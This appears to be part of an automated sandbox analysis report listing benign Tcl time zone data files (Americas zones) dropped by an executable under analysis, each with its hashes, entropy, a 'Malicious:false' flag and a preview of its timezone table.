                                                                                                                                                                                                                                            SSDEEP:48:5uFChlvEwR9xSSx5H4a8tf3fku+da2XUd23t8VZDG8+w/ghBPWTRz908a9zRgwun:cFIlvEwZSSxdF8tfMu+da2kdCt8VZy8n
                                                                                                                                                                                                                                            MD5:F6B732A862659EB131C2E6FEC00E9734
                                                                                                                                                                                                                                            SHA1:49517DF63BC5B6FEC875CE9477BBF84F4072FA31
                                                                                                                                                                                                                                            SHA-256:0E7BA1C5A3FA3DABDAA226BFE1E8D797A3835EA554828881AB5E365EDA09B92E
                                                                                                                                                                                                                                            SHA-512:670A5B604B5EA0F5FA15083BC1EA115B7EFD449F9EAC4518E109493591893DD3627AFC6628E0EDD1953E932E2A7AD9B5A379526548677158EC445366E4ED7166
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sao_Paulo) {.. {-9223372036854775808 -11188 0 LMT}.. {-1767214412 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-195429600 -7200 1 -02}.. {-189381600 -7200 0 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6839
                                                                                                                                                                                                                                            Entropy (8bit):3.565857684485945
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:9OgtbdF7TI7nYUYXg9W/OAcv7vuShytWi0PnvLrqPoKR2XszXckXtogYN4Ezlk0X:PJr9Q7TMq+ML
                                                                                                                                                                                                                                            MD5:D1BF579FE8123E8EE9248A51E794CC78
                                                                                                                                                                                                                                            SHA1:BF9CB9BED143C7529719E0C1E2F88BE1AC9F8DD4
                                                                                                                                                                                                                                            SHA-256:158BD9E4EB0B9DFF3F2D3E2DBA72F217B73423012DD33A688FD57852124E884A
                                                                                                                                                                                                                                            SHA-512:78192AC38912021F848592D0B208CB122EFFC6DDB326540FFAADA4FD3322B7A442FD1116F408D64B8788520B46545DFAE571EA42046D62A282A97ECCD5663655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Scoresbysund) {.. {-9223372036854775808 -5272 0 LMT}.. {-1686090728 -7200 0 -02}.. {323841600 -3600 0 -01}.. {338961600 -7200 0 -02}.. {354679200 0 0 +00}.. {370400400 -3600 0 -01}.. {386125200 0 1 +00}.. {401850000 -3600 0 -01}.. {417574800 0 1 +00}.. {433299600 -3600 0 -01}.. {449024400 0 1 +00}.. {465354000 -3600 0 -01}.. {481078800 0 1 +00}.. {496803600 -3600 0 -01}.. {512528400 0 1 +00}.. {528253200 -3600 0 -01}.. {543978000 0 1 +00}.. {559702800 -3600 0 -01}.. {575427600 0 1 +00}.. {591152400 -3600 0 -01}.. {606877200 0 1 +00}.. {622602000 -3600 0 -01}.. {638326800 0 1 +00}.. {654656400 -3600 0 -01}.. {670381200 0 1 +00}.. {686106000 -3600 0 -01}.. {701830800 0 1 +00}.. {717555600 -3600 0 -01}.. {733280400 0 1 +00}.. {749005200 -3600 0 -01}.. {764730000 0 1 +00}.. {780454800 -3600 0 -01}.. {796179600 0 1 +00}.. {8
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.888573146674231
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/2IAcGEtOFBx+IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/290tO09Z
                                                                                                                                                                                                                                            MD5:2FF74846ADF32AA3A9418376775B7F25
                                                                                                                                                                                                                                            SHA1:130D7548DFFEBCE74969962E335B40299D7C5C54
                                                                                                                                                                                                                                            SHA-256:BF4FAB3AE72CC7FA4F9E34CF0551A85C54A084CD826DF5D9CC684DE6188E84DB
                                                                                                                                                                                                                                            SHA-512:9E52C017E595EEF1C68C8A1943416A9109D7DB4C32D25F83D05213C4200869A50E2E726894E39ECA364C558BB7F5566F6150CEA5D3CB14D1DEAE28C3D8C810E0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:America/Shiprock) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8651
                                                                                                                                                                                                                                            Entropy (8bit):3.959337076866423
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:IGCG0hPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:I5G0A9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:7CCB6902749079A0496F1E2E2137448E
                                                                                                                                                                                                                                            SHA1:3D0ED7BF1C26659F6794E26AE3869F8AB925B6DF
                                                                                                                                                                                                                                            SHA-256:ABB08435CAE80119068A85984BFFE9C1596F4FB90F07CC01124C907E5162C189
                                                                                                                                                                                                                                            SHA-512:0B5B2DCECC70F357DB6D590AB63E600C572EA6B3F430565EFEB29777B1901AAC55CACC7495C668F739201076B180402141BC1B2ED2357E9B4DFBABF3B122AB44
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sitka) {.. {-9223372036854775808 53927 0 LMT}.. {-3225223727 -32473 0 LMT}.. {-2188954727 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {3099492
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):207
                                                                                                                                                                                                                                            Entropy (8bit):4.932842207797733
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290txP90ppv:MByMYbpwt2907P90b
                                                                                                                                                                                                                                            MD5:CBFA61DBF6F7459CF8D517402B29998E
                                                                                                                                                                                                                                            SHA1:A562B29C9470DBD25480966B0462433124BA4164
                                                                                                                                                                                                                                            SHA-256:353CDBD46BA8C7472A93E9E800A69105801F6784B22EC50A59294CDC3BE40E18
                                                                                                                                                                                                                                            SHA-512:00B333EAA2C32EDDA8F06457AD0E10013A0147B20F504F4F1096656F731A7C1896D5ABD83E7EDBD5D4E7DA587EE9BFA796539EB1E9F4056D75D1FDF203251150
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Barthelemy) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11289
                                                                                                                                                                                                                                            Entropy (8bit):3.8713946894934614
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:PmxVjd1cO8f7/EjUhSicN6zvfwb+8YbTE0M0J:PmrcOI7/EjiskY01J
                                                                                                                                                                                                                                            MD5:8F068899DA75663128320633E1881333
                                                                                                                                                                                                                                            SHA1:E9161B45D7B11A2DD6E9679AC080E84EC51561E3
                                                                                                                                                                                                                                            SHA-256:E2917204B0C843C32051BB371CF6D0AD272C02720B9C0D913AC072C8ABE1EC64
                                                                                                                                                                                                                                            SHA-512:2200E9B9D816157330ADAEA7383635876E5A37329B1AF9613D38BCFBE8143835837A25132A94E44A61DB8058ED98B1A33F295EA64BC1F4CE30966D52BB0B673D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/St_Johns) {.. {-9223372036854775808 -12652 0 LMT}.. {-2713897748 -12652 0 NST}.. {-1664130548 -9052 1 NDT}.. {-1650137348 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1598650148 -9052 1 NDT}.. {-1590100148 -12652 0 NST}.. {-1567286948 -9052 1 NDT}.. {-1551565748 -12652 0 NST}.. {-1535837348 -9052 1 NDT}.. {-1520116148 -12652 0 NST}.. {-1503782948 -9052 1 NDT}.. {-1488666548 -12652 0 NST}.. {-1472333348 -9052 1 NDT}.. {-1457216948 -12652 0 NST}.. {-1440883748 -9052 1 NDT}.. {-1425767348 -12652 0 NST}.. {-1409434148 -9052 1 NDT}.. {-1394317748 -12652 0 NST}.. {-1377984548 -9052 1 NDT}.. {-1362263348 -12652 0 NST}.. {-1346534948 -9052 1 NDT}.. {-1330813748 -12652 0 NST}.. {-1314480548 -9052 1 NDT}.. {-1299364148 -12652 0 NST}.. {-1283030948 -9052 1 ND
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.907031043022691
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tMp490ppv:MByMYbpwt290g490b
                                                                                                                                                                                                                                            MD5:D521F2D9B28C5374FC3BD540C6B6F40D
                                                                                                                                                                                                                                            SHA1:39A3D86CB71F742F33B02F50B316638815B3CD4E
                                                                                                                                                                                                                                            SHA-256:EDB9457A7C64E47062BDC6458FD3BCFCD6C37820F1A2BC89DFE99ED77355011F
                                                                                                                                                                                                                                            SHA-512:05C1BE92550A962904ED3BB7DECCAC16FCB54D258F24F2AEDF755FCC44E4FEF5F86AB663945809F5D7AFA64178E807BBDAE77048270ED516DFF2C7720A746D52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Kitts) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.9037013606484905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tY90ppv:MByMYbpwt290a90b
                                                                                                                                                                                                                                            MD5:9392E5A7BD198B0308F9271E4C7E59B2
                                                                                                                                                                                                                                            SHA1:A902440920A0318BC930957C74804A9A51EF7818
                                                                                                                                                                                                                                            SHA-256:6727A509BB937CB3446D41B57826DE70C7028E96F088AB5B7F803BEAA18279E8
                                                                                                                                                                                                                                            SHA-512:6DA1EAC390E72905DF1A14D82362B499D20FAD6D85F3DF116AE01E566D5D19C6D16E56DA72C458BB6143345EF45F35A53B245488C641D80BFBA200B16A59719E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Lucia) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):203
                                                                                                                                                                                                                                            Entropy (8bit):4.919272465019375
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tXIMFJ490ppv:MByMYbpwt290tJ490b
                                                                                                                                                                                                                                            MD5:49D0C8DAFCA053C9967EDCC4C0A484B1
                                                                                                                                                                                                                                            SHA1:7B4999D4B9AD93306BD411DF2946D741EC597770
                                                                                                                                                                                                                                            SHA-256:974AEED3D79124B50265C83D84F23CBE4F0328D00C75F42DD3ABC5D4C0A78DE1
                                                                                                                                                                                                                                            SHA-512:378E3657B26C5A039FF82ECCAC7797FF45CBC6479596629B3048164EE4E035F4ECFC557AA9EAF6848E78999B4FF8C63E53C7163BDF6F626ED6111004490D6F80
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Thomas) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.909053768717241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tzb+Q90ppv:MByMYbpwt290xyQ90b
                                                                                                                                                                                                                                            MD5:6CFB23E7164605CDE380FB7C4D88DF11
                                                                                                                                                                                                                                            SHA1:CC513B29AD7B59E600DBCBC97927EB632558F657
                                                                                                                                                                                                                                            SHA-256:6B19404D295964EF66F47802836BB728FCE8E6481115797C0B5F200C354D7C8A
                                                                                                                                                                                                                                            SHA-512:728987D0925B6E12E8A220920BEDF94180880E78F3F08F6AC740E6304B22D446846068CEA499F61E7032ADB2E700CE31954921D478C9A8B6CB599E05A6292EA3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Vincent) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):874
                                                                                                                                                                                                                                            Entropy (8bit):4.253846650171654
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290hEbmdHLCvYX4Q19xRv0+RmwPj+uLkQOzL3+ORL4FXgenM7RSslKA1PyKp:5zeOvT4xuyqoYaAxt7l
                                                                                                                                                                                                                                            MD5:C91F801CC5E9F78B966D1DF2259C38A8
                                                                                                                                                                                                                                            SHA1:D29C970CBFC74684D46AAAD543B73B520775632C
                                                                                                                                                                                                                                            SHA-256:939B25C9412B9E25D73F552E87826999FC8C929770E66491D1E4530046D3E758
                                                                                                                                                                                                                                            SHA-512:093378E61DE9310F9C48170CBB0FDBD3C79E184DA1489F759B20BCE410006A9D5A793C82E79A46E0AFF0DAA47D9DBAFD605959E491BA9ED4E55D26F293642D32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Swift_Current) {.. {-9223372036854775808 -25880 0 LMT}.. {-2030201320 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-747241200 -21600 0 MDT}.. {-732729600 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {-684342000 -21600 1 MDT}.. {-671040000 -25200 0 MST}.. {-652892400 -21600 1 MDT}.. {-639590400 -25200 0 MST}.. {-631126800 -25200 0 MST}.. {-400086000 -21600 1 MDT}.. {-384364800 -25200 0 MST}.. {-337186800 -21600 1 MDT}.. {-321465600 -25200 0 MST}.. {-305737200 -21600 1 MDT}.. {-292435200 -25200 0 MST}.. {-273682800 -21600 1 MDT}.. {-260985600 -25200 0 MST}.. {73472400 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):341
                                                                                                                                                                                                                                            Entropy (8bit):4.638828647226646
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2903fDm2OHskeoHxbV1ULhgdrV/uF+IcmJ3/uF+ivi9/uF+SNv:MB862903LmdHsVCn1ULSB/uF+QV/uF+q
                                                                                                                                                                                                                                            MD5:4C4034ABAB9E4804CCB23E51694044C9
                                                                                                                                                                                                                                            SHA1:7DB24CE83AB2C07E6F6784D27C4E3AC0F149D080
                                                                                                                                                                                                                                            SHA-256:1F0503579B0DDDBAF88814A278127D9CD7019EDD3C35F4CBFC0EF11C0EDAFE5B
                                                                                                                                                                                                                                            SHA-512:0BC366CD3AB2E1388D11770DC8DEC1FC94C48FDC846ABB6C487828BF9FF15CD9A1C15B33E08F6E48B7F4A6F2AD1617FF12B359784CA4C32256D72422E6825105
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tegucigalpa) {.. {-9223372036854775808 -20932 0 LMT}.. {-1538503868 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}.. {1146981600 -18000 1 CDT}.. {1154926800 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6890
                                                                                                                                                                                                                                            Entropy (8bit):3.8331465442823704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:mJInJuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/Bm6BTd69xK7KjhVbHyR3h1gOZM:miFCC
                                                                                                                                                                                                                                            MD5:D93B62D5F7EEBC28AC047BED2307CAE8
                                                                                                                                                                                                                                            SHA1:8B3E02240A01B5AA42D30E86005E880916432227
                                                                                                                                                                                                                                            SHA-256:7FB0CBB101D3B6FBB6B9DAD5446BBF9E6AEC65EC38472739E604F68F6AA9AB7B
                                                                                                                                                                                                                                            SHA-512:3648106F4DF84CFD94AAD4E9430F8D3BBCB38A9196DE9A59246DFBBC170FADBF106DD1FD08FE2E4F7319BFFB1C2607E4F5D563C222CED8267483D1A0C388CCE5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Thule) {.. {-9223372036854775808 -16508 0 LMT}.. {-1686079492 -14400 0 AST}.. {670399200 -10800 1 ADT}.. {686120400 -14400 0 AST}.. {701848800 -10800 1 ADT}.. {717570000 -14400 0 AST}.. {733903200 -10800 1 ADT}.. {752043600 -14400 0 AST}.. {765352800 -10800 1 ADT}.. {783493200 -14400 0 AST}.. {796802400 -10800 1 ADT}.. {814942800 -14400 0 AST}.. {828856800 -10800 1 ADT}.. {846392400 -14400 0 AST}.. {860306400 -10800 1 ADT}.. {877842000 -14400 0 AST}.. {891756000 -10800 1 ADT}.. {909291600 -14400 0 AST}.. {923205600 -10800 1 ADT}.. {941346000 -14400 0 AST}.. {954655200 -10800 1 ADT}.. {972795600 -14400 0 AST}.. {986104800 -10800 1 ADT}.. {1004245200 -14400 0 AST}.. {1018159200 -10800 1 ADT}.. {1035694800 -14400 0 AST}.. {1049608800 -10800 1 ADT}.. {1067144400 -14400 0 AST}.. {1081058400 -10800 1 ADT}.. {1099198800 -14400 0 AST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.838326820531248
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7RQtHAIgpRQPN/2903MA90RQk:MByMYzp4t2903MA90D
                                                                                                                                                                                                                                            MD5:D68B69B05D8743977BA4815B8AFE8E92
                                                                                                                                                                                                                                            SHA1:364796989B6DD0110F1D85A8844419EB49772EC0
                                                                                                                                                                                                                                            SHA-256:845101F85A6DAF9DEB58A075473F9E541A0B68461677779B1461DE59E3FA3D18
                                                                                                                                                                                                                                            SHA-512:DEAA60DDF1521C269D7D386A7FCC40C8FAFB00EEA6764E6B23F4C65B8F6F596B3D5D2D3F6F7B1C22016C530B8789839F8052FDE1C2794C9F9C700C46DC8A3AEE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Thunder_Bay) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8755
                                                                                                                                                                                                                                            Entropy (8bit):3.8521303835918115
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:CuS6mjvZk53mtw+N6IkWq/WHQlb/RYRWVIKr7cRRL:26jFOzN6IkWq/WHQt/RY4yP
                                                                                                                                                                                                                                            MD5:2F9983FE6248F3BF18ADE00192F4B458
                                                                                                                                                                                                                                            SHA1:73F7302C914E442FC50DD4BFF3C57FD310E6455C
                                                                                                                                                                                                                                            SHA-256:D7C5CB477A591931FF03C794C84EDB2319760C0B70047B325382F211E28648E3
                                                                                                                                                                                                                                            SHA-512:B1F66008F2B62D4E1B59ED1A78A9E4F5D06BE074EB3B2466BDE3C9ED98DE96AD03FACDB8EDA6EE8F8EE890860DE6011F2BB364DE8C1276B31F37C9C525F4EC3F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tijuana) {.. {-9223372036854775808 -28084 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1451667600 -28800 0 PST}.. {-1343062800 -25200 0 MST}.. {-1234803600 -28800 0 PST}.. {-1222963200 -25200 1 PDT}.. {-1207242000 -28800 0 PST}.. {-873820800 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-761677200 -28800 0 PST}.. {-686073600 -25200 1 PDT}.. {-661539600 -28800 0 PST}.. {-504892800 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}.. {-355330800 -28800 0 PST}.. {-337186800 -25200 1 PDT}.. {-323881200 -28800 0 PST}.. {-305737200 -25200 1 PDT}.. {-292431600 -28800 0 PST}.. {-283968000 -28800 0 PST}.. {189331200 -28800 0 PST}.. {19
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11248
                                                                                                                                                                                                                                            Entropy (8bit):3.8061065077303926
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lBew85RnK1a8phYBNXEtCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:lBq5RnK1a8phYTXEItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:0D906EC3F658730131A65C5A770D885F
                                                                                                                                                                                                                                            SHA1:BFA72C43BCE0F37F795E974457FBE4A664687B38
                                                                                                                                                                                                                                            SHA-256:5A98C6BEDDA4DF608051D702A8E037093A8068E1B85F8F55D42B4468F45662A5
                                                                                                                                                                                                                                            SHA-512:CC634DAF4EEC7F57E3AB0C20D891380A7F96DE79602A7B57C6C2BF229DD76A69B399A689FA6D0675380B1432C2115B0C8577DC49C3C9E567A08CAD6FCC3599BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Toronto) {.. {-9223372036854775808 -19052 0 LMT}.. {-2366736148 -18000 0 EST}.. {-1632070800 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1609441200 -18000 0 EST}.. {-1601753400 -14400 1 EDT}.. {-1583697600 -18000 0 EST}.. {-1567357200 -14400 1 EDT}.. {-1554667200 -18000 0 EST}.. {-1534698000 -14400 1 EDT}.. {-1524074400 -18000 0 EST}.. {-1503248400 -14400 1 EDT}.. {-1492365600 -18000 0 EST}.. {-1471798800 -14400 1 EDT}.. {-1460916000 -18000 0 EST}.. {-1440954000 -14400 1 EDT}.. {-1428861600 -18000 0 EST}.. {-1409504400 -14400 1 EDT}.. {-1397412000 -18000 0 EST}.. {-1378054800 -14400 1 EDT}.. {-1365962400 -18000 0 EST}.. {-1346605200 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-1238954400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.864308662322047
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RRKl290ppv:MByMYbpwt290V90b
                                                                                                                                                                                                                                            MD5:21D152A2359A4EFDE6DCC304F16096F3
                                                                                                                                                                                                                                            SHA1:961B3CFB351615604981114A115D396D1F2006A2
                                                                                                                                                                                                                                            SHA-256:46A236EC38F3A122D414208328A462B2A937392ECC6C55F673FB7A402F118D96
                                                                                                                                                                                                                                            SHA-512:04A2AD6DDC2E7B0D3F95DA1C731FF553F8CBC0DD6BDFC36FB2EDCE755612103E3B4EA6F3AB7FE63CA60976538EFABF40827539DFC35B7E83129BD48471FE514B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Tortola) $TZData(:America/Puerto_Rico)..
